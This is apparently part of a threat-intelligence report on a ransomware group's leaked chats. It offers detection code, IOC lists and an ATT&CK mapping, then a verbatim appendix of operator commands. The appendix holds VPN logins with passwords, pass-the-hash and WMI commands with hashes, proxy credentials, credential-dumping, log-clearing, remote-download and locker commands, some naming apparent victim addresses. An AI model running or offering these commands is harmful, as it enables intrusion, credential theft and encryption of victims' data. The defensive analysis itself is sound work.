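    {"host": "ws17", "ts": BASE, "kind": "create", "path": r"C:\Users\a\Desktop\README-GENTLEMEN.txt"},
    {"host": "ws17", "ts": BASE, "kind": "create", "path": r"C:\Windows\Temp\SetupGps2.exe",
     "sha256": "91017846dd71fbbfcd40f116aca8d4c66f51583cb26fa9a54de0e1f08c9cd40f"},
]
# 120 renames in 24 seconds on the NAS (active encryption); 3 on a workstation (noise).
SAMPLE_EVENTS += [{"host": "nas01", "ts": BASE + timedelta(milliseconds=200 * i), "kind": "rename",
                   "path": f"/volume1/DATA/report{i}.xlsx", "new_path": f"/volume1/DATA/report{i}.xlsx.i8p14s"}
                  for i in range(120)]
SAMPLE_EVENTS += [{"host": "ws17", "ts": BASE + timedelta(seconds=10 * i), "kind": "rename",
                   "path": f"C:\\tmp\\f{i}", "new_path": f"C:\\tmp\\f{i}.i8p14s"} for i in range(3)]

if __name__ == "__main__":
    static, alerts = run(SAMPLE_EVENTS)
    print(static)
    print(alerts)
```

The NSS DLL rule deliberately checks the directory: the same four DLLs sit legitimately under the Firefox and Thunderbird install paths, and only their appearance in a staging directory such as `C:\Windows\Temp\` is the indicator the table describes.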
14.4 Pre-Encryption Behaviour Detection
The group runs service-killing scripts before encryption. Monitor for the following command sequences in rapid succession on a single host:
```bash
docker stop $(docker ps -q)
pkill -9 qemu
sudo pkill -9 -f "qemu-system"
sudo systemctl stop $(systemctl list-units --type=service | grep -iE 'mysql|maria...')
```
Detection logic: Alert on any process that sequentially terminates Docker containers, QEMU/KVM VMs, and database services within a short window. This pattern is a strong pre-encryption indicator — legitimate admin operations rarely kill all three service categories together.
Hyper-V targeting: The group also targets Hyper-V volume manager interfaces directly, encrypting at the hypervisor level to bypass guest-level EDR. Monitor for unusual access to Hyper-V virtual disk files (.vhdx, .avhdx) by non-Hyper-V processes, and alert on bulk virtual disk dismount or modification operations.
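The detection logic above is a correlation across three command categories on one host, plus a process-to-file check for the Hyper-V case. The block below is an added example (not code from the report or any EDR product) that implements both over constructed process-creation and file-access telemetry: `service_kill_sequences` categorises each command line and alerts when a host shows all three categories within a window, and `foreign_vdisk_access` lists virtual disk files touched by anything other than a Hyper-V component. The record shapes and the list of Hyper-V process names are assumptions to adapt to your telemetry.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One regex list per service category; all three firing on one host inside the
# window is the pre-encryption signature described in Section 14.4.
CATEGORIES = {
    "containers": [re.compile(r"\bdocker\s+(stop|kill)\b")],
    "hypervisor": [re.compile(r"\b(pkill|killall)\b.*\bqemu")],
    "databases":  [re.compile(r"\bsystemctl\s+stop\b.*(mysql|maria|postgres|mongo|redis|mssql)", re.I)],
}

def categorize(cmdline):
    """Set of categories a command line belongs to (empty for ordinary commands)."""
    return {cat for cat, pats in CATEGORIES.items() if any(p.search(cmdline) for p in pats)}

def service_kill_sequences(events, window=timedelta(seconds=120), required=3):
    """events: (host, ts, cmdline). Return {host: (first_ts, categories)} for hosts where
    commands from >= `required` distinct categories appear within `window`."""
    per_host = defaultdict(list)
    for host, ts, cmd in events:
        cats = categorize(cmd)
        if cats:
            per_host[host].append((ts, cats))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (t0, _) in enumerate(hits):
            seen = set()
            for t, cats in hits[i:]:
                if t - t0 > window:
                    break
                seen |= cats
            if len(seen) >= required:
                alerts[host] = (t0, tuple(sorted(seen)))
                break
    return alerts

# Assumed set of legitimate Hyper-V components; extend from your own baseline.
HYPERV_PROCESSES = {"vmwp.exe", "vmms.exe", "vmcompute.exe"}
VDISK_EXTS = (".vhdx", ".avhdx", ".vhd")

def foreign_vdisk_access(file_events):
    """file_events: (host, process_name, path). Virtual disk files touched by a process
    that is not a Hyper-V component, the hypervisor-level encryption signal."""
    return [(host, proc, path) for host, proc, path in file_events
            if path.lower().endswith(VDISK_EXTS) and proc.lower() not in HYPERV_PROCESSES]

BASE = datetime(2026, 3, 10, 2, 14, 0)
# Constructed process telemetry (not from the leak). srv-db01 shows the full sequence;
# srv-ci02 stops containers and a database hours apart (routine maintenance);
# srv-app03 touches only two of the three categories.
PROCESS_EVENTS = [
    ("srv-db01", BASE, "docker stop $(docker ps -q)"),
    ("srv-db01", BASE + timedelta(seconds=3), "pkill -9 qemu"),
    ("srv-db01", BASE + timedelta(seconds=4), 'sudo pkill -9 -f "qemu-system"'),
    ("srv-db01", BASE + timedelta(seconds=7),
     "sudo systemctl stop $(systemctl list-units --type=service | grep -iE 'mysql|maria')"),
    ("srv-ci02", BASE - timedelta(hours=5), "docker stop build-runner"),
    ("srv-ci02", BASE + timedelta(hours=6), "sudo systemctl stop mariadb"),
    ("srv-app03", BASE, "docker stop $(docker ps -q)"),
    ("srv-app03", BASE + timedelta(seconds=20), "sudo systemctl stop mysql"),
    ("srv-app03", BASE + timedelta(seconds=25), "ls -la /var/lib"),
]
# Constructed file-access telemetry for the Hyper-V check.
FILE_EVENTS = [
    ("hv-01", "vmwp.exe", r"C:\Hyper-V\Virtual Hard Disks\fileserver.vhdx"),
    ("hv-01", "locker.exe", r"C:\Hyper-V\Virtual Hard Disks\fileserver.vhdx"),
    ("hv-01", "explorer.exe", r"C:\Users\ops\notes.txt"),
]

if __name__ == "__main__":
    print(service_kill_sequences(PROCESS_EVENTS))
    print(foreign_vdisk_access(FILE_EVENTS))
```

Requiring all three categories is what keeps this quiet on ordinary hosts: a CI runner stopping containers or a DBA stopping MariaDB is routine, and neither reaches `required=3` on its own.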
14.5 Exfiltration Detection
- Monitor for `rclone` execution and network patterns. The group uses rclone for cloud-based exfiltration. Detect by:
  - Process execution of `rclone.exe` or `rclone` on endpoints where it is not expected
  - High-volume outbound transfers to cloud storage providers (MEGA, Google Drive, Backblaze, etc.) from servers or workstations
  - rclone user-agent strings in proxy/firewall logs
- Alert on LimeWire staging URLs. The group uses `limewire.com/d/` URLs for payload hosting and internal file sharing. Block or alert on outbound connections to `limewire.com` from server infrastructure.
- Monitor `temp.sh` and `0x0.st`. These legitimate anonymous file-sharing services are abused by the G-BOT builder to host payloads. Alert on outbound uploads to these domains from non-user endpoints.
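The proxy-log side of these three bullets can be expressed as two rules over one record stream. The block below is an added example (not code from the report or any proxy vendor): `triage_proxy_events` tags requests carrying the `rclone/` user agent and requests to the staging domains, adding a second tag when the staging request originates from a server VLAN, and `bulk_cloud_uploads` sums outbound bytes per (source, cloud destination) in a sliding one-hour window and alerts past a volume threshold. The record shape (`ts`, `src_ip`, `url`, `bytes_out`, `user_agent`), the server VLAN range, the cloud-storage domain list and the threshold are all assumptions; the proxy records are constructed.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Domains from Section 14.5. CLOUD_STORAGE is a starter list; extend it with the
# providers your organisation does and does not sanction.
STAGING_DOMAINS = {"limewire.com", "temp.sh", "0x0.st"}
CLOUD_STORAGE = {"mega.nz", "mega.co.nz", "drive.google.com", "www.googleapis.com", "api.backblazeb2.com"}
SERVER_NETS = [ipaddress.ip_network("10.0.50.0/24")]   # constructed: the server VLAN
BULK_THRESHOLD = 500 * 1024 * 1024                      # bytes out per (source, destination) per WINDOW
WINDOW = timedelta(hours=1)

def host_of(url):
    return (urlparse(url).hostname or "").lower()

def in_domains(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)

def is_server(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SERVER_NETS)

def triage_proxy_events(events):
    """events: (ts, src_ip, url, bytes_out, user_agent). Per-event findings for the rclone
    user agent and for the group's staging domains; staging access from the server VLAN
    gets an extra tag because no interactive user should be browsing from there."""
    findings = []
    for ts, src, url, _nbytes, ua in events:
        host = host_of(url)
        tags = []
        if ua.lower().startswith("rclone/"):
            tags.append("rclone-user-agent")
        if in_domains(host, STAGING_DOMAINS):
            tags.append("staging-domain")
            if is_server(src):
                tags.append("from-server-vlan")
        if tags:
            findings.append((ts, src, host, tuple(tags)))
    return findings

def bulk_cloud_uploads(events):
    """{(src_ip, host): peak_bytes} for cloud-storage destinations whose outbound volume
    from one source exceeds BULK_THRESHOLD inside any WINDOW (sliding sum)."""
    per_key = defaultdict(list)
    for ts, src, url, nbytes, _ua in events:
        host = host_of(url)
        if in_domains(host, CLOUD_STORAGE):
            per_key[(src, host)].append((ts, nbytes))
    alerts = {}
    for key, rows in per_key.items():
        rows.sort()
        j, total, peak = 0, 0, 0
        for t, n in rows:
            total += n
            while t - rows[j][0] > WINDOW:
                total -= rows[j][1]
                j += 1
            peak = max(peak, total)
        if peak >= BULK_THRESHOLD:
            alerts[key] = peak
    return alerts

BASE = datetime(2026, 3, 11, 1, 0, 0)
MIB = 1024 * 1024
# Constructed proxy records (not from the leak): a server pushing 1.25 GiB to MEGA with
# rclone, a workstation syncing a little to Google Drive, and two staging-domain hits.
PROXY_EVENTS = [(BASE + timedelta(seconds=30 * i), "10.0.50.12",
                 "https://mega.nz/upload", 32 * MIB, "rclone/v1.66.0") for i in range(40)]
PROXY_EVENTS += [(BASE + timedelta(minutes=5 * i), "10.0.20.5",
                  "https://drive.google.com/upload", 2 * MIB,
                  "Mozilla/5.0 (Windows NT 10.0; Win64; x64)") for i in range(5)]
PROXY_EVENTS += [
    (BASE, "10.0.50.12", "https://limewire.com/d/EXAMPLE-ID", 4096, "curl/8.5.0"),   # placeholder id
    (BASE, "10.0.20.5", "https://temp.sh/", 4096, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
]

if __name__ == "__main__":
    for finding in triage_proxy_events(PROXY_EVENTS)[-2:]:
        print(finding)
    print(bulk_cloud_uploads(PROXY_EVENTS))
```

The volume rule is keyed on source and destination together so that a hundred users each syncing a few megabytes to Google Drive stay below the threshold while one server streaming gigabytes to a single MEGA endpoint does not; the user-agent rule catches the same tool even when the destination is a provider you have not listed.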
14.6 Identity and Credential Monitoring
- Monitor Snusbase and similar breach-lookup services. The group uses Snusbase to look up credentials against victim domains. Alert on DNS queries or HTTP connections to `snusbase.com` from corporate networks.
- Detect password spraying patterns against domain controllers. The group pivots from LDAP bind credentials to password spraying. Alert on:
  - Multiple failed authentication attempts from a single source against many accounts
  - LDAP bind attempts using FortiGate service account credentials from non-FortiGate source IPs
- Monitor for Velociraptor MSI deployments. The group deploys Velociraptor v0.76 as a C2 via MSI packages. Alert on unexpected MSI installations of Velociraptor (`velociraptor.msi` or similar) on endpoints where it is not part of the authorised DFIR toolkit.
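The two password-spraying sub-bullets are implemented below as an added example (not code from the report or from Microsoft): `spray_sources` keeps a sliding ten-minute window of failed logons per source IP and alerts when the number of distinct target accounts inside the window crosses a threshold, which separates a spray (many accounts, one or two attempts each) from a brute force against a single account; `rogue_service_binds` lists LDAP binds that use a FortiGate bind DN but do not come from the firewall's own address. The failed-logon record shape (modelled on what Event ID 4625/4771 style records provide), the bind DN set and the management IP set are assumptions; all telemetry is constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def spray_sources(failures, min_accounts=20, window=timedelta(minutes=10)):
    """failures: (ts, src_ip, account) from failed-logon events (4625/4771 style).
    Return {src_ip: peak_distinct_accounts} for sources that fail against >= min_accounts
    distinct accounts inside any `window`. A brute force against one account never
    trips this; many accounts with one or two attempts each is the spray shape."""
    by_src = defaultdict(list)
    for ts, src, acct in failures:
        by_src[src].append((ts, acct.lower()))
    alerts = {}
    for src, rows in by_src.items():
        rows.sort()
        live, j, peak = defaultdict(int), 0, 0
        for t, acct in rows:
            live[acct] += 1
            while t - rows[j][0] > window:          # drop events that fell out of the window
                old = rows[j][1]
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                j += 1
            peak = max(peak, len(live))
        if peak >= min_accounts:
            alerts[src] = peak
    return alerts

# Constructed: the bind DNs configured under 'config user ldap' on the FortiGate and
# the only addresses those accounts should ever bind from.
FORTIGATE_BIND_DNS = {"cn=svc-fortigate,ou=svc,dc=corp,dc=example"}
FORTIGATE_MGMT_IPS = {"10.0.0.1"}

def rogue_service_binds(binds):
    """binds: (ts, src_ip, bind_dn, success). Binds that use a FortiGate LDAP service
    account from an address that is not the firewall itself, the credential-reuse
    signal that follows a leaked FortiGate configuration."""
    return [(ts, src, dn) for ts, src, dn, _ok in binds
            if dn.lower() in FORTIGATE_BIND_DNS and src not in FORTIGATE_MGMT_IPS]

BASE = datetime(2026, 3, 10, 15, 0, 0)
# Constructed telemetry (not from the leak): 40 accounts sprayed once each from
# 10.0.5.23 in four minutes; 60 failures on one account from 10.0.7.9 (a different rule).
FAILURES = [(BASE + timedelta(seconds=6 * i), "10.0.5.23", f"CORP\\user{i:03d}") for i in range(40)]
FAILURES += [(BASE + timedelta(seconds=i), "10.0.7.9", "CORP\\svc-backup") for i in range(60)]
BINDS = [
    (BASE, "10.0.0.1", "cn=svc-fortigate,ou=svc,dc=corp,dc=example", True),
    (BASE + timedelta(minutes=30), "10.0.5.23", "cn=svc-fortigate,ou=svc,dc=corp,dc=example", True),
    (BASE, "10.0.20.5", "cn=jdoe,ou=users,dc=corp,dc=example", True),
]

if __name__ == "__main__":
    print("Spray sources:", spray_sources(FAILURES))
    print("Rogue service binds:", rogue_service_binds(BINDS))
```

Note that the successful bind from 10.0.5.23 is the finding that matters most: the spray detector only sees failures, while a bind with a leaked service account succeeds on the first try and would be invisible to a failures-only rule.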
14.7 NAS and Synology-Specific Guidance
The group actively targets Synology NAS devices with a dedicated Linux locker binary:
- Restrict DSM admin access to management VLANs only. Do not expose DSM (port 5000/5001) to the internet or to general user segments.
- Monitor for unexpected binary creation in `/opt/` — the locker binary path is `/opt/updateamd`.
- Alert on mass file encryption patterns on NAS volumes — sequential rename operations appending `.i8p14s` across shared volumes.
- Review SSH access to NAS devices. The group uses SSH to deploy and execute the locker. Disable SSH on NAS devices where it is not required; where required, restrict to key-based authentication from known management hosts.
- Check for pre-existing compromise. The leak shows the group encountering DeadBolt and DiskStation Security ransom notes on NAS devices they access — indicating that internet-exposed NAS devices may already have been compromised by other groups. Audit NAS devices for existing ransom notes or encrypted files.
14.8 Threat Intelligence Integration
The following IOCs should be ingested into SIEM, EDR, and threat intelligence platforms:
- Hash blocklists: `SetupGps2.exe` SHA-256 `91017846dd71fbbfcd40f116aca8d4c66f51583cb26fa9a54de0e1f08c9cd40f` (MD5: `bdfae4ff271414df8db7bfd255cf603e`)
- Network IOCs: SOCKS5 proxy IP `91.245.35.22:36067`; operator VPN IPs from Section 13.2; .onion addresses from Section 13.1
- BTC wallet monitoring: `1CgfAohwbTSYsyxPvphdcrcfSd1XE5C8Rr`, `bc1qgl29fwvpaky7vr94qwufeq56d00l5h60fe7utx`
- Email IOC: [email protected]
- Tox IDs: Group operational Tox `F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E`
- File patterns: `README-GENTLEMEN*`, `*.i8p14s`, `/opt/updateamd`, `/var/run/gbot_root.pid`
- VPN password patterns: `gentlemen25`, `Gentlemen25`, `gentle26` — if these appear in authentication logs, the device has been or is being targeted by this group
15. MITRE ATT&CK Mapping
Each technique is grouped by operational phase and linked to specific evidence from the leaked corpus — operator commands, room references, and tool deployments. Where verbatim commands or quotes are available, they are cited directly.
Phase 1 — Reconnaissance
| Tactic | Technique | Evidence (Corpus Reference) |
|---|---|---|
| Reconnaissance | T1593 — Search Open Websites/Domains | ZoomInfo used for victim revenue/sector lookup. zeta88 target intake format: “Сектор - софт. Ревеню - 5кк” (Room 100256) |
| Reconnaissance | T1589.002 — Gather Victim Identity Info: Email Addresses | Snusbase credential lookups against victim domains (screenshot evidence; operator browser tabs) |
| Reconnaissance | T1596.001 — Search Open Technical Databases: DNS/Passive DNS | api.c99.nl CLI tool used for subdomain enumeration of victim infrastructure (operator screenshot with JSON response data) |
| Reconnaissance | T1595.002 — Active Scanning: Vulnerability Scanning | Structured FortiGate device scanning: IP, port, model, firmware, hostname, country. 98 deduplicated entries in Fortinet_targets.csv (Room 100256, qbit) |
Phase 2 — Initial Access
| Tactic | Technique | Evidence (Corpus Reference) |
|---|---|---|
| Initial Access | T1190 — Exploit Public-Facing Application | CVE-2024-55591 (FortiOS auth bypass) confirmed exploited. Kunder: “CVEs: [CVE-2024-55591]”. zeta88: “Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation” |
| Initial Access | T1078 — Valid Accounts | Group-branded VPN passwords reused across victims: gentlemen25, Gentlemen25, gentle26. openconnect --protocol=fortinet --no-dtls -u root commands across Rooms 217109, 945300, 843543, 662502 |
| Initial Access | T1566.001 — Phishing: Spearphishing Attachment | FOBOS toolkit: HTMLSMUG, BobTheSmuggler, pdfdropper, PDF+DOC, msi-dropper, CLEARFIX (ClickFix), BITMBMITB (browser-in-the-browser). NEWWAYS subfolder timestamps May 2023–April 2025 |
| Initial Access | T1566.002 — Phishing: Spearphishing Link | waterhydra URL IN ZIP (CVE-2024-21412 exploitation), URIURL handler abuse, polyglotter file creation — all present in FOBOS/NEWWAYS folder structure |
Phase 3 — Credential Access
| Tactic | Technique | Evidence (Corpus Reference) |
|---|---|---|
| Credential Access | T1552.001 — Unsecured Credentials: Credentials In Files | FortiGate config user ldap stanzas shared between affiliates containing plaintext bind DN, password, LDAP server IP, base DN. CyberArk-integrated target also observed (screenshot) |
| Credential Access | T1003 — OS Credential Dumping | KslKatz, KslDump, patched Mimikatz (tanrikuluatahan/mimikatz — Windows 11 24H2/25H2). DumpBrowserSecrets (Maldev-Academy). Chrome App-Bound Encryption Decryption (xaitax) |
| Credential Access | T1003.003 — OS Credential Dumping: NTDS | VSS shadow copy extraction: vssadmin create shadow /for=C: → mklink /d C:\ss \\?\GLOBALROOT\Device\... (Room 724140, zeta88, 2026-02-08) |
| Credential Access | T1555 — Credentials from Password Stores | XenAllPasswordPro mass deployment via SMB: nxc smb $ip -u itadmin -p 'zhhyx3#4$' -X '@("XenAllPasswordPro.exe","freebl3.dll","mozglue.dll"...)' (Room 374857, zeta88, 2026-01-09) |
| Credential Access | T1110.003 — Brute Force: Password Spraying | Password spraying against DCs using LDAP bind credentials extracted from FortiGate configs as starting point. qbit posts brute-force results (Room 302930) |
| Credential Access | T1557.001 — Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning | ntlmrelayx, Responder. NTLM coercion: nxc smb hostx.txt -M coerce_plus (Room 133148, Wick, 2026-01-25). zeta88 enumerates “PrinterBug, PetitPotam, CVE-2025-33073” |
Phase 4 — Discovery and Lateral Movement
| Tactic | Technique | Evidence (Corpus Reference) |
|---|---|---|
| Discovery | T1018 — Remote System Discovery | NetExec SMB scanning: nxc smb 192.168.10.0/24 (32 occurrences). Custom scanner gogo: ./gogo.exe -p 22,53,80,88,389,443,445,3389... -i 192.168.1.0/24 (Rooms 133148, 244725) |
| Discovery | T1087.002 — Account Discovery: Domain Account | BloodHound, CertiHound (ESC1–ESC17), PrivHound for AD attack-path mapping and privilege path discovery. CertiHound + NetExec integration (Room 244725, qbit, 2026-04-10) |
| Lateral Movement | T1021.002 — Remote Services: SMB/Windows Admin Shares | NetExec with forced share creation via PowerShell: Get-PSDrive -PSProvider FileSystem \| ForEach-Object {net share "$($_.Name)$=$($_.Root)" /grant:everyone,FULL} (Room 244725, zeta88) |
| Lateral Movement | T1021.001 — Remote Services: RDP | Pass-the-hash RDP: xfreerdp /v:172.16.1.9 /u:nhpl.admin /pth:'6ff3eae8e5f09f9bba3913bac7ee78e5' (Room 133148, mAst3r, 2026-01-22) |
| Lateral Movement | T1047 — Windows Management Instrumentation | Titanis WMI exec: wmi exec 192.168.1.10 -u Administrator -NtlmHash 27fbd7d724c0b0f12bc46c74ce5aba42 "net user" (Room 244725, zeta88, 2026-03-09) |
| Lateral Movement | T1021.004 — Remote Services: SSH | SSH dynamic forwarding: ssh -NfD 1080 user@ip for SOCKS proxy. Multi-hop: ssh -J user@pivot1 user@pivot2 (Room 244725, zeta88, 2026-01-06) |
Phase 5 — Persistence and Command & Control
| Tactic | Technique | Evidence (Corpus Reference) |
|---|---|---|
| Persistence | T1219 — Remote Access Software | Velociraptor v0.76 repurposed as C2: multi-org configs, MSI client packaging, Server.Utils.CreateMSI artifact (screenshot, 2026-04-06). G-BOT with Linux/Windows beacons |
| C2 | T1071.001 — Application Layer Protocol: Web Protocols | G-BOT Control Panel: web UI, beacon management, builder uploading payloads to temp.sh/0x0.st. PID file: /var/run/gbot_root.pid |
| C2 | T1090 — Proxy | SOCKS5 proxychains pivoting: socks5 91.245.35.22 36067 a53a47b57b8ba462 c791621140ee88f93acd4fb3538b3z55 (Room 302930, qbit/zeta88, 2026-03-18). G-BOT per-beacon SOCKS ports (30001, 30002) |
| C2 | T1090.003 — Proxy: Multi-hop Proxy | chisel-ng tunneling, proxychains-windows, Double-VPN-with-OpenVPN. nsocks .onion proxy service. Internal training guide on SOCKS5 tunneling (screenshot) |
| C2 | T1102 — Web Service | ZeroPulse C2 framework (github.com/jxroot/ZeroPulse) with cloud integration (Room 302930, zeta88, 2026-01-03) |
| Defense Evasion | T1562.001 — Impair Defenses: Disable or Modify Tools | EDRStartupHinder, RedSun evasion framework. Post-leak response announces: HW breakpoint removal from DR registers, NTDLL unhooking, ETW patching. CrowdStrike “killer” priced at ~$5,000 (mAst3r, 2026-01-21) |
| Defense Evasion | T1036.005 — Masquerading: Match Legitimate Name | AV-evasion DLL naming: EAAntiCheat1.exe.dll, Valorant.exe.dll, Sophos.exe.dll, Avast.exe.dll |
Phase 6 — Collection and Exfiltration
| Tactic | Technique | Evidence (Corpus Reference) |
|---|---|---|
| Collection | T1005 — Data from Local System | Financial documents, client databases targeted via SOCKS tunnels to Jira, Confluence, file shares. zeta88 claims “3 TB of ULP and a scraper for them” |
| Collection | T1213 — Data from Information Repositories | Jira ScriptRunner access, Confluence browsing via internal IP through SOCKS tunnel (Room 516533, Protagor, 2026-03-28) |
| Exfiltration | T1567.002 — Exfiltration Over Web Service: Cloud Storage | rclone to MEGA, RcloneView GUI. Cloud mount tools evaluated: RaiDrive, NetDrive, AirLiveDrive, MountainDuck, CyberDuck |
| Exfiltration | T1030 — Data Transfer Size Limits | Unknown aaa.exe with --bwlimit 3M (bandwidth throttling), --transfers 8, --max-age 5y, targeting entire C:\ drive |
| Exfiltration | T1105 — Ingress Tool Transfer | LimeWire staging URLs for tooling distribution (credential harvesters, G-EDR). Payloads hosted on temp.sh/0x0.st via G-BOT builder |
Phase 7 — Impact
| Tactic | Technique | Evidence (Corpus Reference) |
|---|---|---|
| Impact | T1489 — Service Stop | Pre-encryption kill scripts: docker stop $(docker ps -q), pkill -9 qemu, sudo systemctl stop $(systemctl list-units --type=service \| grep -iE 'mysql|maria...') |
| Impact | T1490 — Inhibit System Recovery | Storage array CLI access: delete volume, delete snap-pool, delete snapshots, clear cache commands available. Hyper-V volume-level encryption bypasses guest-level backup agents |
| Impact | T1486 — Data Encrypted for Impact | Linux/NAS locker: /opt/updateamd --password W8wNZteb --path "/volume1/DATA/..." --ultrafast --keep. Windows: locker.exe --password 3kVOuyhF --full --ultrafast. Extension: .i8p14s. Note: README-GENTLEMEN.txt |
| Impact | T1657 — Financial Theft | Negotiation via qTox. Pricing tiers: $65–80K decrypt, $95–120K data removal, $25K report, $100–225K “all options.” BTC payments via 17U3tN7hzwYwwya8qkyZgnG9jy3unHG7xL, cash-out through Tinkoff QR codes |
| Defense Evasion | T1070.004 — Indicator Removal: File Deletion | Nyx forensic trace cleaner (evilsocket/nyx). qbit: “can be built into the locker at the end” (Room 894974, 2026-04-13). Staging directory deletion: rd /s /q C:\Windows\Temp\ |
| Defense Evasion | T1070.001 — Indicator Removal: Clear Windows Event Logs | Event log clearing batch script: wevtutil.exe cl (Room 133148, Wick, 2026-01-22) |
16. Operational Commands Reference
All entries are verbatim from the corpus. 64 entries across 17 rooms, attributed to 6 of 9 identified operators.
VPN Access Commands (13)
| Room | Date | User | Command |
|---|---|---|---|
| 217109 | 2025-11-25 | zeta88 | openconnect --protocol=fortinet --no-dtls -u root 14.99.248.6:10443 / gentlemen25 |
| 945300 | 2025-11-25 | zeta88 | openconnect --protocol=fortinet -u root https://183.66.149.70:8443 / Gentlemen25 |
| 133148 | 2026-01-15 | Wick | openconnect --protocol=fortinet --no-dtls -u marcin.skotnicki https://83.230.14.144:13583 |
| 251173 | 2026-03-12 | Protagor | openconnect --protocol=fortinet --no-dtls --useragent="Mozilla/5.0 (Linux; Android 14; SM-S9788B)..." --os=android -u staudenherz 212.186.182.179:10443 |
| 540495 | 2026-02-05 | zeta88 | openconnect --protocol=fortinet --no-dtls -u fibernoc 161.132.163.0:10443 / f1b3rt3ln0c |
| 662502 | 2026-03-10 | zeta88 | openconnect --protocol=fortinet --no-dtls -u root 202.21.110.114:4433 / gentle26 |
| 843543 | 2026-03-09 | zeta88 | openconnect --protocol=fortinet --no-dtls -u root 102.212.53.2:10443 / gentle26 |
| 516533 | 2026-04-11 | zeta88 | openconnect --protocol=fortinet --no-dtls -u C9013075 ava.[REDACTED].com:10443 |
| 939364 | 2026-04-12 | zeta88 | openconnect --protocol=fortinet --no-dtls -u noppawit 103.125.93.250:10443 |
Recon/Scan Commands (4)
| Room | Date | User | Command |
|---|---|---|---|
| 133148 | 2026-01-18 | Wick | ./gogo.exe -p 22,53,80,88,389,443,445,3389,5900,5910,9401,2179,... --ping -i 192.168.1.0/24 -t 100 -o color |
| 244725 | 2026-02-26 | zeta88 | .\gogo.exe -p 22,53,80,88,389,443,445,... --ping -i 192.168.10.0/24 -t 100 -o color |
| 843543 | 2026-03-10 | Wick | “nxc only scans 1 port (445). When scanning via gogo -p common, it bans. Only shows a couple of hosts” |
Tunnel/Proxy Commands (5)
| Room | Date | User | Command |
|---|---|---|---|
| 302930 | 2026-03-18 | qbit | socks5://a53a47b57b8ba462:[email protected]:36067 |
| 302930 | 2026-03-18 | zeta88 | socks5 91.245.35.22 36067 a53a47b57b8ba462 c791621140ee88f93acd4fb3538b3z55 (proxychains config) |
| 302930 | 2026-03-18 | zeta88 | proxychains -q nxc smb IP.IP.IP.IP/24 |
| 843543 | 2026-03-10 | zeta88 | proxychains nxc smb 10.0.1.0/24 → domain controllers discovered |
SMB/AD Commands (19)
| Room | Date | User | Command |
|---|---|---|---|
| 100256 | 2026-03-09 | zeta88 | nxc smb 192.168.10.0/24 + nxc winrm 192.168.10.0/24 |
| 133148 | 2026-01-22 | Wick | Event log clearing batch script (wevtutil.exe cl) |
| 133148 | 2026-01-25 | Wick | nxc smb hostx.txt -M coerce_plus (NTLM coercion) |
| 133148 | 2026-01-25 | mAst3r | nxc smb <target_ip> -M coerce_plus -o LISTENER=<kali_ip> |
| 244725 | 2026-01-27 | zeta88 | Share creation: Get-PSDrive -PSProvider FileSystem \| Where-Object {$_.Root -match '^[A-Z]:\\'} \| ForEach-Object {net share "$($_.Name)$=$($_.Root)" /grant:everyone,FULL} |
| 244725 | 2026-03-09 | zeta88 | Titanis: wmi exec 192.168.1.10 -u Administrator -NtlmHash 27fbd7d724c0b0f12bc46c74ce5aba42 "net user" |
| 244725 | 2026-03-18 | zeta88 | RegPwn: ./RegPwn.exe --regKey HKLM\SYSTEM\ControlSet001\Services\msiserver --regValueName ImagePath --regValueData "cmd.exe /c net user Administrator ComplexPass123!" --regValueType REG_EXPAND_SZ |
| 244725 | 2026-04-10 | qbit | CertiHound + NetExec AD CS integration (ESC1–ESC17) |
| 374857 | 2026-01-09 | zeta88 | XenAllPasswords mass deployment: for ip in $(cat ips.txt); do nxc smb $ip -u itadmin -p 'zhhyx3#4$' -x 'mkdir C:\Windows\Temp\...' |
| 483722 | 2026-01-30 | Protagor | nxc smb 'C:\Users\4\Downloads\gogo_ips.txt' -u fortigate -p 'ftgdr0wss@P' -X 'Get-PSDrive...' |
| 483722 | 2026-01-30 | Wick | Share mounting: net use Z: \\hostname\sharename |
| 516533 | 2026-03-28 | zeta88 | nxc <IP> -u admin -p pass -M enum_av |
| 540495 | 2026-02-05 | zeta88 | nxc smb 192.168.205.0/24 / 192.168.204.0/24 / 192.168.201.0/24 — “tons of machines” |
| 843543 | 2026-03-15 | zeta88 | GPO spread instructions: psexec \\* -u DOMAIN\Admin -p Password -c -f "C:\local\killer.exe" |
| 894974 | 2026-01-04 | zeta88 | Robocopy mass deployment: robocopy "%source%" "\\%%i\%destination%" /E /COPYALL... |
WinRM/RDP (2)
| Room | Date | User | Command |
|---|---|---|---|
| 133148 | 2026-01-22 | mAst3r | xfreerdp /v:172.16.1.9 /u:nhpl.admin /pth:'6ff3eae8e5f09f9bba3913bac7ee78e5' |
| 133148 | 2026-01-22 | mAst3r | xfreerdp /v:172.16.1.144 /u:nhpl.admin /pth:'6ff3eae8e5f09f9bba3913bac7ee78e5' |
SSH Tunneling (1)
| Room | Date | User | Command |
|---|---|---|---|
| 244725 | 2026-01-06 | zeta88 | ssh -NfD 1080 user@ip → opens SOCKS proxy on 127.0.0.1:1080, add to proxychains. Also: ssh -J user@pivot1 user@pivot2 for multi-hop. |
Credential Dumping / Execution (2)
| Room | Date | User | Command |
|---|---|---|---|
| 724140 | 2026-02-08 | zeta88 | VSS shadow copy for NTDS.dit extraction: vssadmin create shadow /for=C: → mklink /d C:\ss \\?\GLOBALROOT\Device\... |
| 894974 | 2026-04-13 | qbit | Nyx forensic trace cleaner: Invoke-WebRequest -Uri "https://github.com/evilsocket/nyx/raw/refs/heads/main/nyx.ps1" -OutFile "nyx.ps1" — “can be built into the locker at the end” |
C2/Beacon (1)
| Room | Date | User | Command |
|---|---|---|---|
| 894974 | 2026-04-08 | Wick | Velociraptor install guide: wget .../velociraptor-v0.76.1-linux-amd64 → config generation → multi-org setup with MSI client packaging |
Locker Commands (9)
| Room | Date | User | Command |
|---|---|---|---|
| 133148 | 2026-01-22 | Wick | locker --password wbwNZteb --path E:\ --superfast --keHep |
